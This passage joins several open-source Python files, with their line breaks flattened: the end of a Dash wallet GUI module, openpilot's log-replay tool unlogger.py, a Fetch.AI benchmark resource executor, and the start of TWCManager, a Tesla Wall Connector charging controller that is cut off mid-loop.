p.is_enabled())) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) run_hook('init_qt', self.gui_object) for i, descr in enumerate(plugins.descriptions.values()): full_name = descr['__name__'] prefix, _separator, name = full_name.rpartition('.') p = plugins.get(name) if descr.get('registers_keystore'): continue try: cb = QCheckBox(descr['fullname']) plugin_is_loaded = p is not None cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet) or plugin_is_loaded and p.can_user_disable()) cb.setEnabled(cb_enabled) cb.setChecked(plugin_is_loaded and p.is_enabled()) grid.addWidget(cb, i, 0) enable_settings_widget(p, name, i) cb.clicked.connect(partial(do_toggle, cb, name, i)) msg = descr['description'] if descr.get('requires'): msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires'))) grid.addWidget(HelpButton(msg), i, 2) except Exception: self.logger.exception(f"cannot display plugin {name}") grid.setRowStretch(len(plugins.descriptions.values()), 1) vbox.addLayout(Buttons(CloseButton(d))) d.exec_() def save_transaction_into_wallet(self, tx): win = self.top_level_window() try: if not self.wallet.add_transaction(tx.txid(), tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.storage.write() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True def show_masternode_dialog(self): d = MasternodeDialog(self.masternode_manager, self) d.exec_() def proposals_changed(self): """Callback for when proposals change.""" if not self.masternode_manager: return self.update_proposals_tab()
unlogger.py
#!/usr/bin/env python import argparse import os import sys import zmq import time import gc import signal from threading import Thread import numpy as np from uuid import uuid4 from collections import namedtuple from collections import deque from multiprocessing import Process, TimeoutError from datetime import datetime # strat 1: script to copy files # strat 2: build pip packages around these # could be its own pip package, which we'd need to build and release from cereal import log as capnp_log from cereal.services import service_list from cereal.messaging import pub_sock from common import realtime from tools.lib.file_helpers import mkdirs_exists_ok from tools.lib.kbhit import KBHit from tools.lib.logreader import MultiLogIterator from tools.lib.route import Route from tools.lib.route_framereader import RouteFrameReader # Commands. SetRoute = namedtuple("SetRoute", ("name", "start_time", "data_dir")) SeekAbsoluteTime = namedtuple("SeekAbsoluteTime", ("secs",)) SeekRelativeTime = namedtuple("SeekRelativeTime", ("secs",)) TogglePause = namedtuple("TogglePause", ()) StopAndQuit = namedtuple("StopAndQuit", ()) class UnloggerWorker(object): def __init__(self): self._frame_reader = None self._cookie = None self._readahead = deque() def run(self, commands_address, data_address, pub_types): zmq.Context._instance = None commands_socket = zmq.Context.instance().socket(zmq.PULL) commands_socket.connect(commands_address) data_socket = zmq.Context.instance().socket(zmq.PUSH) data_socket.connect(data_address) poller = zmq.Poller() poller.register(commands_socket, zmq.POLLIN) # We can't publish frames without encodeIdx, so add when it's missing. if "frame" in pub_types: pub_types["encodeIdx"] = None # gc.set_debug(gc.DEBUG_LEAK | gc.DEBUG_OBJECTS | gc.DEBUG_STATS | gc.DEBUG_SAVEALL | # gc.DEBUG_UNCOLLECTABLE) # TODO: WARNING pycapnp leaks memory all over the place after unlogger runs for a while, gc # pauses become huge because there are so many tracked objects solution will be to switch to new # cython capnp try: route = None while True: while poller.poll(0.) or route is None: cookie, cmd = commands_socket.recv_pyobj() route = self._process_commands(cmd, route) # **** get message **** self._read_logs(cookie, pub_types) self._send_logs(data_socket) finally: if self._frame_reader is not None: self._frame_reader.close() data_socket.close() commands_socket.close() def _read_logs(self, cookie, pub_types): fullHEVC = capnp_log.EncodeIndex.Type.fullHEVC lr = self._lr while len(self._readahead) < 1000: route_time = lr.tell() msg = next(lr) typ = msg.which() if typ not in pub_types: continue # **** special case certain message types **** if typ == "encodeIdx" and msg.encodeIdx.type == fullHEVC: # this assumes the encodeIdx always comes before the frame self._frame_id_lookup[ msg.encodeIdx.frameId] = msg.encodeIdx.segmentNum, msg.encodeIdx.segmentId #print "encode", msg.encodeIdx.frameId, len(self._readahead), route_time self._readahead.appendleft((typ, msg, route_time, cookie)) def _send_logs(self, data_socket): while len(self._readahead) > 500: typ, msg, route_time, cookie = self._readahead.pop() smsg = msg.as_builder() if typ == "frame": frame_id = msg.frame.frameId # Frame exists, make sure we have a framereader. # load the frame readers as needed s1 = time.time() img = self._frame_reader.get(frame_id, pix_fmt="rgb24") fr_time = time.time() - s1 if fr_time > 0.05: print("FRAME(%d) LAG -- %.2f ms" % (frame_id, fr_time*1000.0)) if img is not None: img = img[:, :, ::-1] # Convert RGB to BGR, which is what the camera outputs img = img.flatten() smsg.frame.image = img.tobytes() data_socket.send_pyobj((cookie, typ, msg.logMonoTime, route_time), flags=zmq.SNDMORE) data_socket.send(smsg.to_bytes(), copy=False) def _process_commands(self, cmd, route): seek_to = None if route is None or (isinstance(cmd, SetRoute) and route.name != cmd.name): seek_to = cmd.start_time route = Route(cmd.name, cmd.data_dir) self._lr = MultiLogIterator(route.log_paths(), wraparound=True) if self._frame_reader is not None: self._frame_reader.close() # reset frames for a route self._frame_id_lookup = {} self._frame_reader = RouteFrameReader( route.camera_paths(), None, self._frame_id_lookup, readahead=True) # always reset this on a seek if isinstance(cmd, SeekRelativeTime): seek_to = self._lr.tell() + cmd.secs elif isinstance(cmd, SeekAbsoluteTime): seek_to = cmd.secs elif isinstance(cmd, StopAndQuit): exit() if seek_to is not None: print("seeking", seek_to) if not self._lr.seek(seek_to): print("Can't seek: time out of bounds") else: next(self._lr) # ignore one return route def _get_address_send_func(address): sock = pub_sock(address) return sock.send def unlogger_thread(command_address, forward_commands_address, data_address, run_realtime, address_mapping, publish_time_length, bind_early, no_loop): # Clear context to avoid problems with multiprocessing. zmq.Context._instance = None context = zmq.Context.instance() command_sock = context.socket(zmq.PULL) command_sock.bind(command_address) forward_commands_socket = context.socket(zmq.PUSH) forward_commands_socket.bind(forward_commands_address) data_socket = context.socket(zmq.PULL) data_socket.bind(data_address) # Set readahead to a reasonable number. data_socket.setsockopt(zmq.RCVHWM, 10000) poller = zmq.Poller() poller.register(command_sock, zmq.POLLIN) poller.register(data_socket, zmq.POLLIN) if bind_early: send_funcs = { typ: _get_address_send_func(address) for typ, address in address_mapping.items() } # Give subscribers a chance to connect. time.sleep(0.1) else: send_funcs = {} start_time = float("inf") printed_at = 0 generation = 0 paused = False reset_time = True prev_msg_time = None while True: evts = dict(poller.poll()) if command_sock in evts: cmd = command_sock.recv_pyobj() if isinstance(cmd, TogglePause): paused = not paused if paused: poller.modify(data_socket, 0) else: poller.modify(data_socket, zmq.POLLIN) else: # Forward the command the the log data thread. # TODO: Remove everything on data_socket. generation += 1 forward_commands_socket.send_pyobj((generation, cmd)) if isinstance(cmd, StopAndQuit): return reset_time = True elif data_socket in evts: msg_generation, typ, msg_time, route_time = data_socket.recv_pyobj(flags=zmq.RCVMORE) msg_bytes = data_socket.recv() if msg_generation < generation: # Skip packets. continue if no_loop and prev_msg_time is not None and prev_msg_time > msg_time + 1e9: generation += 1 forward_commands_socket.send_pyobj((generation, StopAndQuit())) return prev_msg_time = msg_time msg_time_seconds = msg_time * 1e-9 if reset_time: msg_start_time = msg_time_seconds real_start_time = realtime.sec_since_boot() start_time = min(start_time, msg_start_time) reset_time = False if publish_time_length and msg_time_seconds - start_time > publish_time_length: generation += 1 forward_commands_socket.send_pyobj((generation, StopAndQuit())) return # Print time. if abs(printed_at - route_time) > 5.: print("at", route_time) printed_at = route_time if typ not in send_funcs: if typ in address_mapping: # Remove so we don't keep printing warnings. address = address_mapping.pop(typ) try: print("binding", typ) send_funcs[typ] = _get_address_send_func(address) except Exception as e: print("couldn't replay {}: {}".format(typ, e)) continue else: # Skip messages that we are not registered to publish. continue # Sleep as needed for real time playback. if run_realtime: msg_time_offset = msg_time_seconds - msg_start_time real_time_offset = realtime.sec_since_boot() - real_start_time lag = msg_time_offset - real_time_offset if lag > 0 and lag < 30: # a large jump is OK, likely due to an out of order segment if lag > 1: print("sleeping for", lag) time.sleep(lag) elif lag < -1: # Relax the real time schedule when we slip far behind. reset_time = True # Send message. send_funcs[typ](msg_bytes) def timestamp_to_s(tss): return time.mktime(datetime.strptime(tss, '%Y-%m-%d--%H-%M-%S').timetuple()) def absolute_time_str(s, start_time): try: # first try if it's a float return float(s) except ValueError: # now see if it's a timestamp return timestamp_to_s(s) - start_time def _get_address_mapping(args): if args.min is not None: services_to_mock = [ 'thermal', 'can', 'health', 'sensorEvents', 'gpsNMEA', 'frame', 'encodeIdx', 'model', 'features', 'liveLocation', 'gpsLocation' ] elif args.enabled is not None: services_to_mock = args.enabled else: services_to_mock = service_list.keys() address_mapping = {service_name: service_name for service_name in services_to_mock} address_mapping.update(dict(args.address_mapping)) for k in args.disabled: address_mapping.pop(k, None) non_services = set(address_mapping) - set(service_list) if non_services: print("WARNING: Unknown services {}".format(list(non_services))) return address_mapping def keyboard_controller_thread(q, route_start_time): print("keyboard waiting for input") kb = KBHit() while 1: c = kb.getch() if c=='m': # Move forward by 1m q.send_pyobj(SeekRelativeTime(60)) elif c=='M': # Move backward by 1m q.send_pyobj(SeekRelativeTime(-60)) elif c=='s': # Move forward by 10s q.send_pyobj(SeekRelativeTime(10)) elif c=='S': # Move backward by 10s q.send_pyobj(SeekRelativeTime(-10)) elif c=='G': # Move backward by 10s q.send_pyobj(SeekAbsoluteTime(0.)) elif c=="\x20": # Space bar. q.send_pyobj(TogglePause()) elif c=="\n": try: seek_time_input = raw_input('time: ') seek_time = absolute_time_str(seek_time_input, route_start_time) q.send_pyobj(SeekAbsoluteTime(seek_time)) except Exception as e: print("Time not understood: {}".format(e)) def get_arg_parser(): parser = argparse.ArgumentParser( description="Mock openpilot components by publishing logged messages.", formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument("route_name", type=(lambda x: x.replace("#", "|")), nargs="?", help="The route whose messages will be published.") parser.add_argument("data_dir", nargs='?', default=os.getenv('UNLOGGER_DATA_DIR'), help="Path to directory in which log and camera files are located.") parser.add_argument("--no-loop", action="store_true", help="Stop at the end of the replay.") key_value_pair = lambda x: x.split("=") parser.add_argument("address_mapping", nargs="*", type=key_value_pair, help="Pairs <service>=<zmq_addr> to publish <service> on <zmq_addr>.") comma_list = lambda x: x.split(",") to_mock_group = parser.add_mutually_exclusive_group() to_mock_group.add_argument("--min", action="store_true", default=os.getenv("MIN")) to_mock_group.add_argument("--enabled", default=os.getenv("ENABLED"), type=comma_list) parser.add_argument("--disabled", type=comma_list, default=os.getenv("DISABLED") or ()) parser.add_argument( "--tl", dest="publish_time_length", type=float, default=None, help="Length of interval in event time for which messages should be published.") parser.add_argument( "--no-realtime", dest="realtime", action="store_false", default=True, help="Publish messages as quickly as possible instead of realtime.") parser.add_argument( "--no-interactive", dest="interactive", action="store_false", default=True, help="Disable interactivity.") parser.add_argument( "--bind-early", action="store_true", default=False, help="Bind early to avoid dropping messages.") return parser def main(argv): args = get_arg_parser().parse_args(sys.argv[1:]) command_address = "ipc:///tmp/{}".format(uuid4()) forward_commands_address = "ipc:///tmp/{}".format(uuid4()) data_address = "ipc:///tmp/{}".format(uuid4()) address_mapping = _get_address_mapping(args) command_sock = zmq.Context.instance().socket(zmq.PUSH) command_sock.connect(command_address) if args.route_name is not None: route_name_split = args.route_name.split("|") if len(route_name_split) > 1: route_start_time = timestamp_to_s(route_name_split[1]) else: route_start_time = 0 command_sock.send_pyobj( SetRoute(args.route_name, 0, args.data_dir)) else: print("waiting for external command...") route_start_time = 0 subprocesses = {} try: subprocesses["data"] = Process( target=UnloggerWorker().run, args=(forward_commands_address, data_address, address_mapping.copy())) subprocesses["control"] = Process( target=unlogger_thread, args=(command_address, forward_commands_address, data_address, args.realtime, _get_address_mapping(args), args.publish_time_length, args.bind_early, args.no_loop)) for p in subprocesses.values(): p.daemon = True subprocesses["data"].start() subprocesses["control"].start() # Exit if any of the children die. def exit_if_children_dead(*_): for name, p in subprocesses.items(): if not p.is_alive(): [p.terminate() for p in subprocesses.values()] exit() signal.signal(signal.SIGCHLD, signal.SIGIGN) signal.signal(signal.SIGCHLD, exit_if_children_dead) if args.interactive: keyboard_controller_thread(command_sock, route_start_time) else: # Wait forever for children. while True: time.sleep(10000.) finally: for p in subprocesses.values(): if p.is_alive(): try: p.join(3.) except TimeoutError: p.terminate() continue if __name__ == "__main__": sys.exit(main(sys.argv[1:]))
executor.py
# -*- coding: utf-8 -*- # ------------------------------------------------------------------------------ # # Copyright 2018-2019 Fetch.AI Limited # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ------------------------------------------------------------------------------ """Executor to run and measure resources consumed by python code.""" import datetime import inspect import multiprocessing import time from collections import namedtuple from multiprocessing import Process from operator import attrgetter from statistics import mean from typing import Callable, List, Tuple import memory_profiler # type: ignore import psutil # type: ignore from benchmark.framework.benchmark import BenchmarkControl # noqa: I100 from tests.common.utils import timeit_context ResourceStats = namedtuple("ResourceStats", "time,cpu,mem") class ExecReport: """Process execution report.""" def __init__( self, args: tuple, time_passed: float, stats: List[ResourceStats], is_killed: bool, period: float, ): """Make an instance. :param args: tuple of arguments passed to function tested. :param time_passed: time test function was executed. :param stats: list of ResourceStats: cpu, mem. :param is_killed: was process terminated by timeout. :param period: what is measurement period length. """ self.args = args self.report_created = datetime.datetime.now() self.time_passed = time_passed self.stats = stats self.is_killed = is_killed self.period = period @property def cpu(self) -> List[float]: """ Return list of cpu usage records. :return: list of cpu usage values """ return list(map(attrgetter("cpu"), self.stats)) @property def mem(self) -> List[float]: """ Return list of memory usage records. :return: list of memory usage values """ return list(map(attrgetter("mem"), self.stats)) def __str__(self) -> str: """ Render report to string. :return: string representation of report. """ return inspect.cleandoc( f""" == Report created {self.report_created} == Arguments are `{self.args}` Time passed {self.time_passed} Terminated by timeout: {self.is_killed} Cpu(%) mean: {mean(self.cpu)} Cpu(%) min: {min(self.cpu)} Cpu(%) max: {max(self.cpu)} Mem(kb) mean: {mean(self.mem)} Mem(kb) min: {min(self.mem)} Mem(kb) max: {max(self.mem)} """ ) class Executor: """Process execution and resources measurement.""" def __init__(self, period: float = 0.1, timeout: float = 30): """ Set executor with parameters. :param period: period to take resource measurement. :param timeout: time limit to perform test, test process will be killed after timeout. """ self.period = period self.timeout = timeout def run(self, func: Callable, args: tuple) -> ExecReport: """ Run function to be tested for performance. :param func: function or callable to be tested for performance. :param args: tuple of argument to pass to function tested. :return: execution report for single test run """ process = self._prepare(func, args) time_usage, stats, killed = self._measure(process) return self._report(args, time_usage, stats, killed) @staticmethod def _prepare(func: Callable, args: tuple) -> Process: """ Start process and wait process ready to be measured. :param func: function or callable to be tested for performance. :param args: tuple of argument to pass to function tested. :return: process with tested code """ control: BenchmarkControl = BenchmarkControl() process = Process(target=func, args=(control, *args)) process.start() msg = control.wait_msg() if msg != control.START_MSG: raise ValueError("Msg does not match control start message.") return process def _measure( self, process: multiprocessing.Process ) -> Tuple[float, List[ResourceStats], bool]: """ Measure resources consumed by the process. :param process: process to measure resource consumption :return: time used, list of resource stats, was killed """ started_time = time.time() is_killed = False proc_info = psutil.Process(process.pid) stats = [] with timeit_context() as timeit: while process.is_alive(): if time.time() - started_time > self.timeout: is_killed = True break stats.append(self._get_stats_record(proc_info)) time.sleep(self.period) if is_killed: process.terminate() process.join() time_usage = timeit.time_passed return time_usage, stats, is_killed @staticmethod def _get_stats_record(proc_info: psutil.Process) -> ResourceStats: """ Read resources usage and create record. :param proc_info: process information to get cpu usage and memory usage from. :return: one time resource stats record """ return ResourceStats( time.time(), proc_info.cpu_percent(), memory_profiler.memory_usage(proc_info.pid, max_usage=True), ) def _report( self, args: tuple, time_passed: float, stats: List[ResourceStats], is_killed: bool, ) -> ExecReport: """ Create execution report. :param args: tuple of argument to pass to function tested. :param time_passed: time test function was executed. :param stats: list of ResourceStats: cpu, mem. :param is_killed: was process terminated by timeout. :return: test case one execution report """ return ExecReport(args, time_passed, stats, is_killed, self.period)
TWCManager.py
#! /usr/bin/python3 ################################################################################ # Code and TWC protocol reverse engineering by Chris Dragon. # # Additional logs and hints provided by Teslamotorsclub.com users: # TheNoOne, IanAmber, and twc. # Thank you! # # For support and information, please read through this thread: # https://teslamotorsclub.com/tmc/threads/new-wall-connector-load-sharing-protocol.72830 # # Report bugs at https://github.com/ngardiner/TWCManager/issues # # This software is released under the "Unlicense" model: http://unlicense.org # This means source code and TWC protocol knowledge are released to the general # public free for personal or commercial use. I hope the knowledge will be used # to increase the use of green energy sources by controlling the time and power # level of car charging. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # # For more information, please visit http://unlicense.org import commentjson import importlib import json import os.path import math import re import sys from termcolor import colored import time import traceback from datetime import datetime import threading from ww import f from lib.TWCManager.TWCMaster import TWCMaster import requests # Define available modules for the instantiator # All listed modules will be loaded at boot time # Logging modules should be the first one to load modules_available = [ "Logging.ConsoleLogging", "Logging.FileLogging", "Logging.CSVLogging", "Logging.MySQLLogging", # "Logging.SQLiteLogging", "Interface.Dummy", "Interface.RS485", "Interface.TCP", "Policy.Policy", "Vehicle.TeslaAPI", "Control.WebIPCControl", "Control.HTTPControl", "Control.MQTTControl", "EMS.Enphase", "EMS.Fronius", "EMS.HASS", "EMS.SolarEdge", "EMS.SolarLog", "EMS.TeslaPowerwall2", "EMS.TED", "EMS.OpenHab", "EMS.Kostal", "Status.HASSStatus", "Status.MQTTStatus", ] # Enable support for Python Visual Studio Debugger if "DEBUG_SECRET" in os.environ: import ptvsd ptvsd.enable_attach(os.environ["DEBUG_SECRET"]) ptvsd.wait_for_attach() ########################## # Load Configuration File config = None jsonconfig = None if os.path.isfile("/etc/twcmanager/config.json"): jsonconfig = open("/etc/twcmanager/config.json") else: if os.path.isfile("config.json"): jsonconfig = open("config.json") if jsonconfig: config = commentjson.load(jsonconfig) else: debugLog(1, "Unable to find a configuration file.") sys.exit() # All TWCs ship with a random two-byte TWCID. We default to using 0x7777 as our # fake TWC ID. There is a 1 in 64535 chance that this ID will match each real # TWC on the network, in which case you should pick a different random id below. # This isn't really too important because even if this ID matches another TWC on # the network, that TWC will pick its own new random ID as soon as it sees ours # conflicts. fakeTWCID = bytearray(b"\x77\x77") # # End configuration parameters # ############################## ############################## # # Begin functions # def debugLog(minlevel, message): if master == None: # It arrives only here if nothing is set if config["config"]["debugLevel"] >= minlevel: print( colored(master.time_now() + " ", "yellow") + colored("TWCManager", "green") + colored(f(" {minlevel} "), "cyan") + f("{message}") ) else: master.debugLog(minlevel, "TWCManager", message) def hex_str(s: str): return " ".join("{:02X}".format(ord(c)) for c in s) def hex_str(ba: bytearray): return " ".join("{:02X}".format(c) for c in ba) def time_now(): global config return datetime.now().strftime( "%H:%M:%S" + (".%f" if config["config"]["displayMilliseconds"] else "") ) def unescape_msg(msg: bytearray, msgLen): # Given a message received on the RS485 network, remove leading and trailing # C0 byte, unescape special byte values, and verify its data matches the CRC # byte. msg = msg[0:msgLen] # See notes in RS485.send() for the way certain bytes in messages are escaped. # We basically want to change db dc into c0 and db dd into db. # Only scan to one less than the length of the string to avoid running off # the end looking at i+1. i = 0 while i < len(msg): if msg[i] == 0xDB: if msg[i + 1] == 0xDC: # Replace characters at msg[i] and msg[i+1] with 0xc0, # shortening the string by one character. In Python, msg[x:y] # refers to a substring starting at x and ending immediately # before y. y - x is the length of the substring. msg[i : i + 2] = [0xC0] elif msg[i + 1] == 0xDD: msg[i : i + 2] = [0xDB] else: debugLog( 1, "ERROR: Special character 0xDB in message is " "followed by invalid character 0x%02X. " "Message may be corrupted." % (msg[i + 1]), ) # Replace the character with something even though it's probably # not the right thing. msg[i : i + 2] = [0xDB] i = i + 1 # Remove leading and trailing C0 byte. msg = msg[1 : len(msg) - 1] return msg def background_tasks_thread(master): carapi = master.getModuleByName("TeslaAPI") while True: try: task = master.getBackgroundTask() if task["cmd"] == "applyChargeLimit": carapi.applyChargeLimit(limit=task["limit"]) elif task["cmd"] == "charge": # car_api_charge does nothing if it's been under 60 secs since it # was last used so we shouldn't have to worry about calling this # too frequently. carapi.car_api_charge(task["charge"]) elif task["cmd"] == "carApiEmailPassword": carapi.setCarApiLastErrorTime(0) carapi.car_api_available(task["email"], task["password"]) elif task["cmd"] == "checkArrival": limit = ( carapi.lastChargeLimitApplied if carapi.lastChargeLimitApplied != 0 else -1 ) carapi.applyChargeLimit(limit=limit, checkArrival=True) elif task["cmd"] == "checkCharge": carapi.updateChargeAtHome() elif task["cmd"] == "checkDeparture": carapi.applyChargeLimit( limit=carapi.lastChargeLimitApplied, checkDeparture=True ) elif task["cmd"] == "checkGreenEnergy": check_green_energy() elif task["cmd"] == "getLifetimekWh": master.getSlaveLifetimekWh() elif task["cmd"] == "getVehicleVIN": master.getVehicleVIN(task["slaveTWC"], task["vinPart"]) elif task["cmd"] == "snapHistoryData": master.snapHistoryData() elif task["cmd"] == "updateStatus": update_statuses() elif task["cmd"] == "webhook": if(config["config"].get("webhookMethod", "POST") == "GET"): requests.get(task["url"]) else: body = master.getStatus() requests.post(task["url"], json=body) elif task["cmd"] == "saveSettings": master.saveSettings() except: master.debugLog( 1, "TWCManager", colored("BackgroundError", "red") + ": " + traceback.format_exc() + ", occurred when processing background task", ) pass # Delete task['cmd'] from backgroundTasksCmds such that # queue_background_task() can queue another task['cmd'] in the future. master.deleteBackgroundTask(task) # task_done() must be called to let the queue know the task is finished. # backgroundTasksQueue.join() can then be used to block until all tasks # in the queue are done. master.doneBackgroundTask() def check_green_energy(): global config, hass, master # Check solar panel generation using an API exposed by # the HomeAssistant API. # # You may need to customize the sensor entity_id values # to match those used in your environment. This is configured # in the config section at the top of this file. # greenEnergyAmpsOffset = config["config"]["greenEnergyAmpsOffset"] if greenEnergyAmpsOffset >= 0: master.setConsumption( "Manual", master.convertAmpsToWatts(greenEnergyAmpsOffset) ) else: master.setGeneration( "Manual", -1 * master.convertAmpsToWatts(greenEnergyAmpsOffset) ) # Poll all loaded EMS modules for consumption and generation values for module in master.getModulesByType("EMS"): master.setConsumption(module["name"], module["ref"].getConsumption()) master.setGeneration(module["name"], module["ref"].getGeneration()) master.setMaxAmpsToDivideAmongSlaves(master.getMaxAmpsToDivideGreenEnergy()) def update_statuses(): # Print a status update if we are on track green energy showing the # generation and consumption figures maxamps = master.getMaxAmpsToDivideAmongSlaves() maxampsDisplay = f("{maxamps:.2f}A") if master.getModuleByName("Policy").policyIsGreen(): genwatts = master.getGeneration() conwatts = master.getConsumption() chgwatts = master.getChargerLoad() for module in master.getModulesByType("Logging"): module["ref"].greenEnergy( {"genWatts": genwatts, "conWatts": conwatts, "chgWatts": chgwatts} ) nominalOffer = master.convertWattsToAmps( genwatts - (conwatts - (chgwatts if config["config"]["subtractChargerLoad"] else 0)) ) if abs(maxamps - nominalOffer) > 0.005: nominalOfferDisplay = f("{nominalOffer:.2f}A") debugLog( 10, f( "Offering {maxampsDisplay} instead of {nominalOfferDisplay} to compensate for inexact current draw" ), ) conwatts = genwatts - master.convertAmpsToWatts(maxamps) generation = f("{master.convertWattsToAmps(genwatts):.2f}A") consumption = f("{master.convertWattsToAmps(conwatts):.2f}A") debugLog( 1, f( "Limiting charging to {colored(generation, 'magenta')} - {colored(consumption, 'magenta')} = {colored(maxampsDisplay, 'magenta')}." ), ) else: # For all other modes, simply show the Amps to charge at debugLog(1, f("Limiting charging to {colored(maxampsDisplay, 'magenta')}.")) # Print minimum charge for all charging policies minchg = f("{config['config']['minAmpsPerTWC']}A") debugLog(1, f("Charge when above {colored(minchg, 'magenta')} (minAmpsPerTWC).")) # Update Sensors with min/max amp values for module in master.getModulesByType("Status"): module["ref"].setStatus( bytes("config", "UTF-8"), "min_amps_per_twc", "minAmpsPerTWC", config["config"]["minAmpsPerTWC"], "A", ) module["ref"].setStatus( bytes("all", "UTF-8"), "max_amps_for_slaves", "maxAmpsForSlaves", master.getMaxAmpsToDivideAmongSlaves(), "A", ) # # End functions # ############################## ############################## # # Begin global vars # data = "" dataLen = 0 ignoredData = bytearray() msg = bytearray() msgLen = 0 numInitMsgsToSend = 10 msgRxCount = 0 idxSlaveToSendNextHeartbeat = 0 timeLastkWhDelivered = time.time() timeLastkWhSaved = time.time() timeLastHeartbeatDebugOutput = 0 webMsgPacked = "" webMsgMaxSize = 300 webMsgResult = 0 timeTo0Aafter06 = 0 timeToRaise2A = 0 # # End global vars # ############################## ############################## # # Begin main program # # Instantiate necessary classes master = TWCMaster(fakeTWCID, config) # Instantiate all modules in the modules_available list automatically for module in modules_available: modulename = [] if str(module).find(".") != -1: modulename = str(module).split(".") try: moduleref = importlib.import_module("lib.TWCManager." + module) modclassref = getattr(moduleref, modulename[1]) modinstance = modclassref(master) # Register the new module with master class, so every other module can # interact with it master.registerModule( {"name": modulename[1], "ref": modinstance, "type": modulename[0]} ) except ImportError as e: master.debugLog( 1, "TWCManager", colored("ImportError", "red") + ": " + str(e) + ", when importing module " + colored(module, "red") + ", not using " + colored(module, "red"), ) except ModuleNotFoundError as e: master.debugLog( 1, "TWCManager", colored("ModuleNotFoundError", "red") + ": " + str(e) + ", when importing " + colored(module, "red") + ", not using " + colored(module, "red"), ) except: raise # Load settings from file master.loadSettings() # Create a background thread to handle tasks that take too long on the main # thread. For a primer on threads in Python, see: # http://www.laurentluce.com/posts/python-threads-synchronization-locks-rlocks-semaphores-conditions-events-and-queues/ backgroundTasksThread = threading.Thread(target=background_tasks_thread, args=(master,)) backgroundTasksThread.daemon = True backgroundTasksThread.start() debugLog( 1, "TWC Manager starting as fake %s with id %02X%02X and sign %02X" % ( ("Master" if config["config"]["fakeMaster"] else "Slave"), ord(fakeTWCID[0:1]), ord(fakeTWCID[1:2]), ord(master.getSlaveSign()), ), ) while True: try: # In this area, we always send a linkready message when we first start. # Whenever there is no data available from other TWCs to respond to, # we'll loop back to this point to send another linkready or heartbeat # message. By only sending our periodic messages when no incoming # message data is available, we reduce the chance that we will start # transmitting a message in the middle of an incoming message, which # would corrupt both messages. # Add a 25ms sleep to prevent pegging pi's CPU at 100%. Lower CPU means # less power used and less waste heat. time.sleep(0.025) now = time.time() if config["config"]["fakeMaster"] == 1: # A real master sends 5 copies of linkready1 and linkready2 whenever # it starts up, which we do here. # It doesn't seem to matter if we send these once per second or once # per 100ms so I do once per 100ms to get them over with. if numInitMsgsToSend > 5: master.send_master_linkready1() time.sleep(0.1) # give slave time to respond numInitMsgsToSend -= 1 elif numInitMsgsToSend > 0: master.send_master_linkready2() time.sleep(0.1) # give slave time to respond numInitMsgsToSend = numInitMsgsToSend - 1 else: # After finishing the 5 startup linkready1 and linkready2 # messages, master will send a heartbeat message to every slave # it's received a linkready message from. Do that here. # A real master would keep sending linkready messages periodically # as long as no slave was connected, but since real slaves send # linkready once every 10 seconds till they're connected to a # master, we'll just wait for that. if time.time() - master.getTimeLastTx() >= 1.0: # It's been about a second since our last heartbeat. if master.countSlaveTWC() > 0: slaveTWC = master.getSlaveTWC(idxSlaveToSendNextHeartbeat) if time.time() - slaveTWC.timeLastRx > 26: # A real master stops sending heartbeats to a slave # that hasn't responded for ~26 seconds. It may # still send the slave a heartbeat every once in # awhile but we're just going to scratch the slave # from our little black book and add them again if # they ever send us a linkready. debugLog( 1, "WARNING: We haven't heard from slave " "%02X%02X for over 26 seconds. " "Stop sending them heartbeat messages." % (slaveTWC.TWCID[0], slaveTWC.TWCID[1]), ) master.deleteSlaveTWC(slaveTWC.TWCID) else: slaveTWC.send_master_heartbeat() idxSlaveToSendNextHeartbeat = idxSlaveToSendNextHeartbeat + 1 if idxSlaveToSendNextHeartbeat >= master.countSlaveTWC(): idxSlaveToSendNextHeartbeat = 0 time.sleep(0.1) # give slave time to respond else: # As long as a slave is running, it sends link ready messages every # 10 seconds. They trigger any master on the network to handshake # with the slave and the master then sends a status update from the # slave every 1-3 seconds. Master's status updates trigger the slave # to send back its own status update. # As long as master has sent a status update within the last 10 # seconds, slaves don't send link ready. # I've also verified that masters don't care if we stop sending link # ready as long as we send status updates in response to master's # status updates. if ( config["config"]["fakeMaster"] != 2 and time.time() - master.getTimeLastTx() >= 10.0 ): debugLog( 1, "Advertise fake slave %02X%02X with sign %02X is " "ready to link once per 10 seconds as long as master " "hasn't sent a heartbeat in the last 10 seconds." % ( ord(fakeTWCID[0:1]), ord(fakeTWCID[1:2]), ord(master.getSlaveSign()), ), ) master.send_slave_linkready() # See if there's any message from the web interface. if master.getModuleByName("WebIPCControl"): master.getModuleByName("WebIPCControl").processIPC() # If it has been more than 2 minutes since the last kWh value, # queue the command to request it from slaves if config["config"]["fakeMaster"] == 1 and ( (time.time() - master.lastkWhMessage) > (60 * 2) ): master.lastkWhMessage = time.time() master.queue_background_task({"cmd": "getLifetimekWh"}) # If it has been more than 1 minute since the last VIN query with no # response, and if we haven't queried more than 5 times already for this # slave TWC, repeat the query 